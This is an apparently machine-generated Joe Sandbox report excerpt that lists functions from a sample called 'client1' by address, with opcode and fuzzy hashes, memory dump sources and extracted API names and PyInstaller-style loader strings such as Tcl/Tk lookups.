                                                    • Opcode Fuzzy Hash: 25b4879d951165098d7d9ad8dfdbe188c5f26750c92d05a39af3c572e9b4c9ce
                                                    • Instruction Fuzzy Hash: A1C186721141E04BE2D9EB29E8698BEB792F78930DBD4403BEB8747B89C73CA414D751
                                                    Function 00007FF79F631E70 Relevance: .2, Instructions: 241COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3511ad376341763adbf03eaa1481790c1cd7a3e825f7d6c297581565e8b6740f
                                                    • Instruction ID: 957c856e394793d0d122c94744af0b0d728baf1d43c01e59203c787af219ea50
                                                    • Opcode Fuzzy Hash: 3511ad376341763adbf03eaa1481790c1cd7a3e825f7d6c297581565e8b6740f
                                                    • Instruction Fuzzy Hash: 87B18A72A08B8585E7749F39C0502BCBBAAE745B88FA84139CB5E47399CFB9D445C720
                                                    Function 00007FF79F63D718 Relevance: .2, Instructions: 198COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b482d32cf4439f597672c93949c919f143e2d798b80af63496daf47fa9f459cc
                                                    • Instruction ID: c471f9e08b2a993ffdf48d146317d7bffb43a584c5cf259f1a27838826839cbd
                                                    • Opcode Fuzzy Hash: b482d32cf4439f597672c93949c919f143e2d798b80af63496daf47fa9f459cc
                                                    • Instruction Fuzzy Hash: 5581D472A087C585EB74EB3994403B9E6A6FB45794F944235DAAD43BC9DF7CF4008B10
                                                    Function 00007FF79F645820 Relevance: .2, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 093da9d804f6d3f0dcf011766d3ac1044083a14a82be884a6ec622c588f21297
                                                    • Instruction ID: 6b03643ae669f92b7e0fdc29916b452537edaca45991fcb017ba4a9429c9f85b
                                                    • Opcode Fuzzy Hash: 093da9d804f6d3f0dcf011766d3ac1044083a14a82be884a6ec622c588f21297
                                                    • Instruction Fuzzy Hash: E061D522E183D246FB74BA7994502FDE69BBF40370F944239D63E866D6DE6DEC408720
                                                    Function 00007FF79F630FB4 Relevance: .1, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d861661aa08db629cc23cdca8c369b076586a2e450c00db1ba5d57a294e44a4f
                                                    • Instruction ID: df02e9c36dfd779a1eeb64ee4d1834cde1357acb24fff15c354d28ce838adbba
                                                    • Opcode Fuzzy Hash: d861661aa08db629cc23cdca8c369b076586a2e450c00db1ba5d57a294e44a4f
                                                    • Instruction Fuzzy Hash: B4519636E187D182E7349B39C4402B8B7A6EB49B58F644131CE9D07799CFBAE843C750
                                                    Function 00007FF79F6313C4 Relevance: .1, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 867914ff4df0b6b44d704adc42bbe88cde9096fdc707783f05752eff833c7ffe
                                                    • Instruction ID: 4590db4cda342153865add82397c1956de1b7d3bf520d6aa6eabe4107079265a
                                                    • Opcode Fuzzy Hash: 867914ff4df0b6b44d704adc42bbe88cde9096fdc707783f05752eff833c7ffe
                                                    • Instruction Fuzzy Hash: AC51B476E1879182E7349F39D0402B8B3A6EB48B68F654131CE5D477A9CFBAE843C750
                                                    Function 00007FF79F630BA4 Relevance: .1, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c32b4ddfd43473a216dec7aa9a0be5b617892f75f4149cffacdc7470c95e978f
                                                    • Instruction ID: 234cd2e47202026b8e0a3ecfadb6f1e29f4c6b90ae910281e505b3629379936f
                                                    • Opcode Fuzzy Hash: c32b4ddfd43473a216dec7aa9a0be5b617892f75f4149cffacdc7470c95e978f
                                                    • Instruction Fuzzy Hash: 6151D272A1879196E7349B38C0402BCB3BAEB44B5CF645231CE5D07795CBBAE847C750
                                                    Function 00007FF79F630DB0 Relevance: .1, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1de1d42fcd570761cca71ddda72003ed022ec41b6526507f8e47f89f031e3167
                                                    • Instruction ID: 2efbf3abda2455b6c0219104832d4dc4038a56ec56e7234a62b94cbbe1f6ac08
                                                    • Opcode Fuzzy Hash: 1de1d42fcd570761cca71ddda72003ed022ec41b6526507f8e47f89f031e3167
                                                    • Instruction Fuzzy Hash: 3051BC36B1879196E7349B38C0403ACA3AAEB48B5CFA44135CE5C077A8CB7AE856C750
                                                    Function 00007FF79F6311C0 Relevance: .1, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6b4a4146db3bd1fe649265067838c8b0d7c1a5e97031d62dd0eb31e0fdd0228e
                                                    • Instruction ID: 31ec17a741cca85075fbd86c8f61e5c3ecf68a8b685a8c88518b2aa1589fb0a5
                                                    • Opcode Fuzzy Hash: 6b4a4146db3bd1fe649265067838c8b0d7c1a5e97031d62dd0eb31e0fdd0228e
                                                    • Instruction Fuzzy Hash: 0451BF32E1879186E7749B39C1402BCA3AAEB48B58FA44131CE5C5779CCB7AE893C750
                                                    Function 00007FF79F6309A0 Relevance: .1, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 876697f8e8f5cbbdb44752562e3cb115d809b93d1bac5633a342ac63b65505f1
                                                    • Instruction ID: 06bc6c55b64034403f65e6f0497352844f49cc6f2079139cae5a33b65040ecd1
                                                    • Opcode Fuzzy Hash: 876697f8e8f5cbbdb44752562e3cb115d809b93d1bac5633a342ac63b65505f1
                                                    • Instruction Fuzzy Hash: E351D133A187D592E7349B38D0003BCA3AAEB45B5CFA84131CE5D17796CBBAE846C750
                                                    Function 00007FF79F634F50 Relevance: .1, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                    • Instruction ID: 8ae6fabea2abc05d61b46a9c6d2222c9f03cee19dd94d6ce7551100ef7cb1f3f
                                                    • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                    • Instruction Fuzzy Hash: 0441D45380D7CB44FD71993845006F8E6CAAF627A0DE862B4CCBA133D2CE8E6986C160
                                                    Function 00007FF79F638BA0 Relevance: .1, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 485612231-0
                                                    • Opcode ID: d52a693ca64156346f3ce50e8e1564a69fccf06189b002bdd4e7495fde204544
                                                    • Instruction ID: 3466ad367906a6bab20ce04bd543433f9c9bfee1f09206e43ea5b445ddaf248a
                                                    • Opcode Fuzzy Hash: d52a693ca64156346f3ce50e8e1564a69fccf06189b002bdd4e7495fde204544
                                                    • Instruction Fuzzy Hash: D9412463B18B8482EF24DF7AD9141E9A3A6AB48FD0B889032DE1D97B54DE7CD0468300
                                                    Function 00007FF79F636560 Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ee4673de95ce1c3203f19ce9ce644468e75f80e7845f38315ddde02822e300f2
                                                    • Instruction ID: a859812cc080d3349723cd0ae5298f34eb1abe99c025d1d8faf8c8082b2c3095
                                                    • Opcode Fuzzy Hash: ee4673de95ce1c3203f19ce9ce644468e75f80e7845f38315ddde02822e300f2
                                                    • Instruction Fuzzy Hash: CF31D732718B8141E738AF35A8401BDBADAAF85BE0F544238EA6D53BD5DF7CD0128714
                                                    Function 00007FF79F6489B0 Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b98f8205f4dd5ad0f3b4c63852b6076f32f3a1b530b1ff8e23dc59df104b107b
                                                    • Instruction ID: 3055b0362c0626e5a6f5bf3a6b98eba540cf95bf21390012339f1296aca8dbe3
                                                    • Opcode Fuzzy Hash: b98f8205f4dd5ad0f3b4c63852b6076f32f3a1b530b1ff8e23dc59df104b107b
                                                    • Instruction Fuzzy Hash: 23F068717187A58ADBA8AF79A802669B7E5F7083C0F809039D59D83B04D63C90618F14
                                                    Function 00007FF79F62B880 Relevance: .0, Instructions: 2COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 03ec394501486fefa8e68c4fc5f22486c81951ca79d36a27091b1f9b4683aa64
                                                    • Instruction ID: c81dc4a0721c148f9c5c9142e677b235afd6a434249df25d6b2891036d10e79c
                                                    • Opcode Fuzzy Hash: 03ec394501486fefa8e68c4fc5f22486c81951ca79d36a27091b1f9b4683aa64
                                                    • Instruction Fuzzy Hash: D7A0022190CE86E0EA64BF20EC900F0A37AFB90310BC04031D42D821A09F3CB440D721
                                                    Function 00007FF79F6255D0 Relevance: 166.5, APIs: 31, Strings: 64, Instructions: 287libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$LOADER: Failed to load tcl/tk libraries$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                    • API String ID: 2238633743-1453502826
                                                    • Opcode ID: ba523ba2b13c4ea14ee618d69630f35f7ff64aa3d65f3ca8e14aa07d75cb9247
                                                    • Instruction ID: b30a9a20e4738194fb40c84eba7b36943a02debceca7de32295cc50003b78bbb
                                                    • Opcode Fuzzy Hash: ba523ba2b13c4ea14ee618d69630f35f7ff64aa3d65f3ca8e14aa07d75cb9247
                                                    • Instruction Fuzzy Hash: AAE1D760A09B8390FA75FB35A9941F4E3BFAF047A4BD45135C82E46764EF7CA5488332
                                                    Function 00007FF79F622030 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                    • String ID: P%
                                                    • API String ID: 2147705588-2959514604
                                                    • Opcode ID: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                    • Instruction ID: 1fb5cea2d22745308a5aad75a2ecaaeb968f502ae9f829d35afa07a1d340ab56
                                                    • Opcode Fuzzy Hash: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                    • Instruction Fuzzy Hash: 2D5106266187E186E634AF32A4581FAF7A2F798B65F004121EFDE83684DF3CD045DB20
                                                    Function 00007FF79F630228 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: f$f$p$p$f
                                                    • API String ID: 3215553584-1325933183
                                                    • Opcode ID: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                    • Instruction ID: 3ec97ae38e25c2ae4738682ddf7c8afc54605f162cdf39b16da1d5dd63216689
                                                    • Opcode Fuzzy Hash: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                    • Instruction Fuzzy Hash: 3A129661E0C3C396FB30BA24E1542FEF69BEB80758FD44035D6A9465C9DBBCE5488B60
                                                    Function 00007FF79F6212B0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                    • API String ID: 2030045667-3659356012
